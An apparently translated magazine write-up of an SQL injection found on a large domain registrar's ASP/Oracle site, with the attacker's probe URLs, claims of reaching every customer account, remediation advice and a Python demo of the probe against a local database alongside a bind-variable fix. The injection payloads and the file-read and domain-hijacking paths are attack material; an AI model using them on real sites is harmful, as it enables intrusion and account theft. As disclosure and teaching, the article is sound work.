Oracle also has injection vulnerabilities

  • 2020-05-13 03:43:23
  • OfStack

Recently MSN, Jiangmin and other well-known websites have been threatened and attacked by hackers, and for a while the whole network was on edge. Our editorial office received a call from the author, Seraphim, describing in detail a vulnerability found on the website of the country's largest domain name provider (X). The editorial office immediately contacted X's chief engineer, who confirmed that the vulnerability was genuine and repaired it promptly.

Discovery

On October 18, after finishing my current project, I was chatting with friends around the country. Hearing that a friend's website had just gone live made me envious: when would I have a host and domain name of my own? Thinking about applying for one, I naturally thought of X (very famous in China ^_^). When I opened the homepage I noticed the member login form in the upper right corner, and the "thief" in me woke up again: with nothing else to do anyway, why not look for a loophole?
I took out a port scanner and swept X's web server, and unexpectedly found no weakness at all. Depressing! Thinking about it, X has been in business for more than ten years, and such a large site will not be short of security measures: port mapping, IDS and a firewall, every patch applied, perhaps even a honeypot waiting for you.
After a while I noticed something: X's site is written in ASP. Not long ago ASP+MSSQL injection vulnerabilities caused a lot of noise and many sites suffered. Could there be a problem here too? Let us try. I picked a page for buying a virtual host: http://www.??.cn/HAS_Client/buy/vir_host/vir_host1_SB.asp?PackageID=10341. Testing it with the classic method returned "Type mismatch: 'CDbl'", the VBScript error raised when the page tries to convert the parameter to a number. So what database does X use? I appended a single quote to the parameter and submitted the request, and the page came back with an error message.

So it was Oracle. An Oracle database that echoes such an error may well be injectable. This is similar to the error MSSQL returns on an unbalanced quote, but where an MSSQL error of that kind almost certainly means an injection vulnerability, with Oracle one more step is needed to be sure.

Confirmation

The following steps are important, because they are the basis for the whole intrusion. In IE I submitted, in turn:
http://www.?????.cn/HAS_Client/buy/vir_host/vir_host1_SB.asp?PackageID=10341'%20and%200<>(select%20count(*)%20from%20all_tables)%20and%20'1'='1
http://www.?????.cn/HAS_Client/buy/vir_host/vir_host1_SB.asp?PackageID=10341'%20and%200<>(select%20count(*)%20from%20user_tables)%20and%20'1'='1
http://www.?????.cn/HAS_Client/buy/vir_host/vir_host1_SB.asp?PackageID=10341'%20and%200<>(select%20count(*)%20from%20user_tab_columns)%20and%20'1'='1
Each appends a subquery against an Oracle data dictionary view I guessed at: all_tables, user_tables and user_tab_columns. The closing quote of the original query is balanced by the trailing '1'='1, so if the view exists the condition is true and the page should render as normal. If the guesses had been wrong, that would have been the end of it.
Unexpectedly, all three pages came back normally, which shows that the guessed dictionary views exist and, more importantly, that the submitted SQL was executed by the application. (A stricter check pairs each true condition with a deliberately false one, for example replacing '1'='1 with '1'='2, and confirms that the page changes; a page that renders identically for both would prove nothing.)
At this point I was sure that X's site had an injection vulnerability.

Exploitation

The database is arguably the most important asset of a site. Through the vulnerability found above, all data in the database can be read and modified: not just user accounts, but everything it holds.

If execute on the UTL_FILE package has been granted to PUBLIC, a UNION-based injection can also be used to read files on the server, much like load_file() in PHP+MySQL injection, and statements such as UPDATE can be run as well. I am still a novice at Oracle injection, however, and I did not manage to insert data or carry out more advanced attacks. Throughout the testing, NBSI's background scanning function and WPE greatly improved efficiency.
I now have access to all of X's user accounts, and by logging in as any of them I could easily change their domain name settings. A malicious attacker would only need to point a commercial site's domain at a fake site of their own making, and every account credential entered on that "commercial site" would be exposed. In effect this vulnerability amounts to domain hijacking: as long as you are an X customer, I am sure your site can be taken over. As for X itself, every one of its businesses could be affected, with data read and manipulated at will.
Other harms are equally obvious and need not be spelled out.

Remediation

To prevent this kind of injection, the fix is straightforward: strictly validate the parameters submitted in the URL. Check the query string in code, and as soon as a single quote, semicolon, SQL keyword or other special character is found, redirect to a custom error page. Filtering characters and keywords alone is easy to bypass, though; the reliable fix is to verify that PackageID is the number the page expects and to pass it to the database through a bind variable rather than by string concatenation, so that user input can never become part of the SQL statement.
For X's administrators the fix took less than five minutes. Beyond that, X should also strengthen data security inside the database, at the very least by encrypting sensitive data.
Incidentally, many domestic sites have the same kind of injection vulnerability.
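The following is an added example, not code from the original article or from X's site. It simulates the pattern the article describes: an ASP-style handler that splices PackageID into a SQL string, probed with the same true-condition payload used in the Confirmation section together with its false twin (the stricter check mentioned there), and then the hardened handler that validates the parameter and binds it. The real target ran Oracle; here sqlite3 stands in so the example runs offline, and the packages table, the stand-in all_tables table, the handler names and the example URL are all constructed for the demo.

```python
"""Boolean-based confirmation of an injectable parameter, and the fix.

Added example (not the article's code). sqlite3 stands in for Oracle; the
tables, handlers and URL below are constructed for the demo.
"""
import sqlite3
import urllib.parse


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE packages (PackageID TEXT, name TEXT, price REAL);
        INSERT INTO packages VALUES ('10341', 'Virtual host SB', 99.0);
        -- stand-in for Oracle's ALL_TABLES data dictionary view
        CREATE TABLE all_tables (table_name TEXT);
        INSERT INTO all_tables VALUES ('PACKAGES');
    """)
    return db


DB = make_db()


def vulnerable_page(package_id):
    """Mirrors the ASP pattern: the query-string value is spliced into SQL."""
    sql = "SELECT name, price FROM packages WHERE PackageID='" + package_id + "'"
    try:
        row = DB.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # The article's target echoed the Oracle error; this one echoes sqlite's.
        return "database error: " + str(exc)
    return "package page: %s" % row[0] if row else "not found"


def hardened_page(package_id):
    """Reject anything but the expected numeric id, then use a bind variable."""
    if not package_id.isdigit():
        return "error page"
    sql = "SELECT name, price FROM packages WHERE PackageID=?"
    row = DB.execute(sql, (package_id,)).fetchone()
    return "package page: %s" % row[0] if row else "not found"


def probe_pair(base_value, subquery="select count(*) from all_tables"):
    """The article's true-condition payload and a deliberately false twin.

    The application's own closing quote balances the trailing '1'='1.
    """
    true_cond = "%s' and 0<>(%s) and '1'='1" % (base_value, subquery)
    false_cond = "%s' and 0<>(%s) and '1'='2" % (base_value, subquery)
    return true_cond, false_cond


def probe_urls(base_url, base_value):
    """Encode both payloads the way the article's URLs were written."""
    return [base_url + "?PackageID=" + urllib.parse.quote(p, safe="'()*=<>")
            for p in probe_pair(base_value)]


def is_injectable(page, base_value="10341"):
    """Boolean differential: true probe == normal page, false probe != normal page."""
    baseline = page(base_value)
    true_cond, false_cond = probe_pair(base_value)
    resp_true, resp_false = page(true_cond), page(false_cond)
    return (resp_true == baseline
            and resp_false != baseline
            and "error" not in resp_true.lower())


if __name__ == "__main__":
    for url in probe_urls("http://www.example.cn/HAS_Client/buy/vir_host/vir_host1_SB.asp", "10341"):
        print(url)
    print("vulnerable handler injectable:", is_injectable(vulnerable_page))
    print("hardened handler injectable:", is_injectable(hardened_page))
```

The differential matters: the vulnerable handler returns the normal page for the true probe and "not found" for the false one, while the hardened handler sends both probes to the error page and a lone single quote never reaches the database at all.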

Editor's afterword

After a series of worm and virus attacks, everyone pays close attention to server security; some sites even leave only port 80 open. Today the security of the code running on the server matters just as much: a small oversight in the code can bring the whole site down.

Today it is a database injection vulnerability; what will appear tomorrow?

